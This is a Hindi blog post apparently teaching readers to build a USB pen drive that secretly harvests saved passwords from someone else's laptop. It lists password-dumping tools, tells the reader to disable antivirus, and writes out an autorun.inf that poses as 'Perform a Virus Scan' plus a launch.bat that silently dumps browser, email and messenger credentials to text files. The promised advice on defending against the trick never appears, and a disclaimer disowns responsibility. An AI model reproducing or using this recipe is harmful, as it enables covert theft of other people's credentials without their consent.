Laptop se password uthane wali pendrive kaise bnaye
Hello Oll portal ke pathko, 😎😎
आज मैं फिर से आपके लिए लाया हूं एक बहुत ही बेहतरीन पोस्ट इस पोस्ट को पढ़कर आपको ऐसा लगेगा कि आपको कुछ ऐसा आता है जो दूसरों को नहीं आता और इससे आप अपने लैपटॉप या फिर कंप्यूटर को और ज्यादा सुरक्षित कर पाओगे आज मैं आपको इस पोस्ट में बताऊंगा उसे आप दो तरह से यूज कर सकते हैं. या तो अच्छी तरह से या बुरी तरह से यह आपके ऊपर डिपेंड करता है क्या आप मेरी इस पोस्ट का इस्तेमाल कैसे करोगे मैं किसी भी चीज के लिए जिम्मेदार नहीं होऊंगा आप जो कुछ करेंगे अब आप अपनी मर्जी के साथ करेंगे. मैं यह पोस्ट सिर्फ और सिर्फ आप लोगों को कुछ सिखाने के लिए लिख रहा. कोई भी व्यक्ति जिसे सामान्य ज्ञान है लैपटॉप और कंप्यूटर के बारे में वैसे बड़े आराम से कर लेगा और अपने आप को बचा भी लेगा
इस पोस्ट में मैं आपको बताऊंगा कि आप कैसे किसी सिर्फ एक पेन ड्राइव की मदद से किसी के पूरे लैपटॉप या फिर कंप्यूटर के अंदर जितने भी stored पासवर्ड (paswords) है उन्हें केवल 2 सेकेंड में अपनी पेन ड्राइव के अंदर कैसे डाले. यह काम सुनने में जितना आसान है उतना ही करने में भी आसान है मैं इस पोस्ट के आखिर में यह भी बताऊंगा कि आप अपने लैपटॉप और कंप्यूटर को इस से कैसे बचाएं. इसे करने के लिए आपको नीचे लिखे गए सामान की आवश्यकता होगी/.
सामान की आवश्यकता:-
- सबसे पहले आपके पास पेन ड्राइव का होना जरूरी है. जैसे किसी भी साइज की हो चलेगा
- एक कंप्यूटर या लैपटॉप.
- Messen Pass.EXE: यह आपके उन पासवर्ड को रिकवर करेगा जो सबसे ज्यादा चर्चा में है मतलब पॉपुलर है.
- Mail PassView:.EXE: यह आपके ईमेल प्रोग्राम्स के पासवर्ड स्टोर करने में मदद करेगा जैसे Yahoo MessengerETC.
- IE Passview:.EXE: यह ऐसा छोटा प्रोग्राम है जो आपको वह पासवर्ड दिखाएगा जो आपके इंटरनेट एक्सप्लोरर में सेव है और ऐसे बहुत कम लोग होंगे जो इंटरनेट एक्सप्लोरर चलाते होंगे.
- Protected Storage PassView: यह फोन पासवर्ड को उठाने में मदद करेगा जो आपके लैपटॉप की या कंप्यूटर की स्टोरेज के अंदर सेव होते .जैसे Facebook के पासवर्ड आदि.
- PasswordFox.EXE: यह आपके फोन पासवर्ड को सेव करने में मदद करेगा जो मोज़िला फ़ायरफ़ॉक्स वेब ब्राउज़र में SAVE होते हैं. यह भी एक छोटा सा सॉफ्टवेयर है जो यूज़रनेम भी दिखाएगा
करने से पहले एंटीवायरस को थोड़ी देर के लिए डिसेबल कर दे
पासवर्ड स्टोर करने वाली पेन ड्राइव कैसे बनाएं:-
- ऊपर लिखे हुए सभी सॉफ्टवेयर को डाउनलोड करें और EXTRACT कर ले अपनी पेन ड्राइव में
- फिर नोटपैड खोलें और वहां पर टाइप करें [autorun] open=launch.bat ACTION= Perform a Virus Scan अब SAVE AS पर क्लिक करें और उसका नाम autorun.inf रख दे. यह करने के बाद इस नोट बेड वाली फाइल को पेन ड्राइव में कॉपी कर ले.
- अब एक और नोटपैड फाइल बनाएं और उसमें लिखें start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt start iepv.exe /stext iepv.txt start pspv.exe /stext pspv.txt start passwordfox.exe /stext passwordfox.txt यह लिखने के बाद SAVE AS पर क्लिक करें और उसे नाम launch.bat दे सर इस फाइल को पेन ड्राइव में कॉपी करें
7 people who can restart Internet ||hindi||
यह सब करने के बाद आपकी पेन ड्राइव तैयार है जिसे अब किसी के भी कंप्यूटर लैपटॉप के साथ लगाएंगे तो आपको उस कंप्यूटर या लैपटॉप के अंदर के सभी पासवर्ड दिखा देगी.
आप अपने पेन ड्राइव को किसी लैपटॉप के साथ लगाएं फिर परफॉर्म वायरस SCAN पर क्लिक करें. अब आपके सभी दोस्त चुपचाप काम करना शुरू हो जाएंगे हो जाएंगे इसमें बहुत ही कम समय लगेगा सभी पासवर्ड एक टेक्स्ट(.TXT) फॉर्मेट में SAVE होंगे. अपनी पेनड्राइव को वहां से रिमूव कर दें और अपने लैपटॉप पर लगा कर देखें उसके अंदर SAVE हुए पासवर्ड.
Note:-यह पूरी पोस्ट सिर्फ आप सब का ज्ञान बढ़ाने के लिए लिखी गयी है. आप इसका जिस भी तरीके से इस्तेमाल करेंगे उसके लिए इस पोस्ट या ब्लॉग का राइटर जिम्मेदार नहीं होगा।
Tags:-how to,pen drive, password ,fetching,storing,solution,vulnerable,laptop,computer,recovery
All about Dark web and stories ||Hindi||